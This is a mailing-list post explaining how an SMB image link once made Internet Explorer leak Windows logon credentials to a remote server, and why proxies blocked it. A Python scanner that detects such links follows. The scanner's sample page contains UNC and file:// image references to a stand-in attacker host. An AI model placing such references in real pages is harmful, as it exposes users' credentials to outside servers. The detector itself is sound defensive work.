> You _NEVER_ want to do a 'site-wide' anything... _ALWAYS_ specify each host,
> and what it is allowed to do...
That's a good attitude, but it inevitably leads to using proxies
rather than NAT. :-)
Here's an example of a classic attack from a couple of years ago
that worked through NAT, but not through proxies. Windows 95 user
running IExplorer accesses a web page. After downloading it,
IExplorer looks at the links to the images and starts loading them.
However, one link is not an http link but an SMB link. IExplorer
says, `No problem, I'm Windows; I know how to do that!' and opens
up an SMB connection to the given server. However, the SMB server
rejects the first connection, saying `You need a password for that.'
At this point IExplorer digs around for a password, and finds the
one that the user used to log on to the local NT file server. It
merrily sends that off, the remote SMB server logs it and sends
back the image. The attacker now has a valid username and password
for that NT server.
When you're using proxies this won't work, unless you specifically
proxy SMB (which you wouldn't, normally).
If you need something more than proxies can do for you, the next
step would be to use NAT with heavy filtering or socks with heavy
restrictions or something like that.
cjs
-- 
Curt Sampson < >  604-257-9400  De gustibus, aut bene aut nihil.
Any opinions expressed are mine and mine alone.
The most widely ported operating system in the world: http://www.netbsd.org
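The attack Curt describes hinges on a single HTML reference that is not an HTTP URL but a UNC or file:// reference pointing at a remote host, which an SMB-capable Windows client resolves by opening an SMB session (and, after the server's "need a password" reply, authenticating with the user's cached logon credentials). The scanner below is an added example, not code from the original message or from any product mentioned in it: it walks a page's auto-fetched resource attributes and reports every reference that would make such a client talk SMB to a remote host. The sample page and the host name `attacker.example` are constructed for illustration.

```python
"""Flag HTML resource references that would make an SMB-capable client
(e.g. the Windows 95 / IE case in the post) open an SMB connection to a
remote host: raw UNC paths (\\host\share\file) and file:// URLs whose host
part is not the local machine.

Added example; not code from the original post. SAMPLE_PAGE is constructed.
"""

from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes browsers fetch automatically (src, background) or on click (href).
RESOURCE_ATTRS = {"src", "href", "background", "data", "poster"}
# Hosts that do not cause a network SMB session.
LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def smb_target(url):
    """Return the remote host an SMB-capable client would contact for this
    reference, or None if the reference is plain HTTP/local and harmless."""
    u = url.strip()
    # Raw UNC path written straight into the attribute: \\host\share\file.gif
    if u.startswith("\\\\"):
        host = u[2:].split("\\", 1)[0]
        return host or None
    # Normalise backslashes so file://\\host\share also parses as a URL.
    parsed = urlsplit(u.replace("\\", "/"))
    if parsed.scheme.lower() != "file":
        return None
    # file://host/share/file.gif -> Windows maps this to \\host\share\file.gif
    if parsed.netloc.lower() not in LOCAL_HOSTS:
        return parsed.netloc
    # file:////host/share/file.gif -> empty netloc, host is in the path
    if parsed.path.startswith("//"):
        host = parsed.path[2:].split("/", 1)[0]
        return host or None
    return None


class RefCollector(HTMLParser):
    """Collect (tag, attribute, value) for every resource-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower() in RESOURCE_ATTRS and value:
                self.refs.append((tag, name.lower(), value))


def find_smb_references(html):
    """Return [(tag, attr, url, remote_host)] for references that trigger SMB."""
    collector = RefCollector()
    collector.feed(html)
    hits = []
    for tag, attr, url in collector.refs:
        host = smb_target(url)
        if host is not None:
            hits.append((tag, attr, url, host))
    return hits


# Constructed sample page: three harmless references and two SMB-triggering ones.
SAMPLE_PAGE = """<html><body>
<img src="http://www.example.com/banner.gif">
<img src="//www.example.com/logo.gif">
<img src="\\\\attacker.example\\pics\\spacer.gif">
<img src="file://attacker.example/pics/spacer.gif">
<a href="file:///C:/docs/readme.txt">local file</a>
</body></html>"""


if __name__ == "__main__":
    for tag, attr, url, host in find_smb_references(SAMPLE_PAGE):
        print(f"<{tag} {attr}> -> SMB session to {host}: {url}")
```

A proxy-only firewall stops the session because nothing proxies port 139 outbound; behind NAT the check above is the kind of content-level filter (or outbound port 139/445 block) you would need instead.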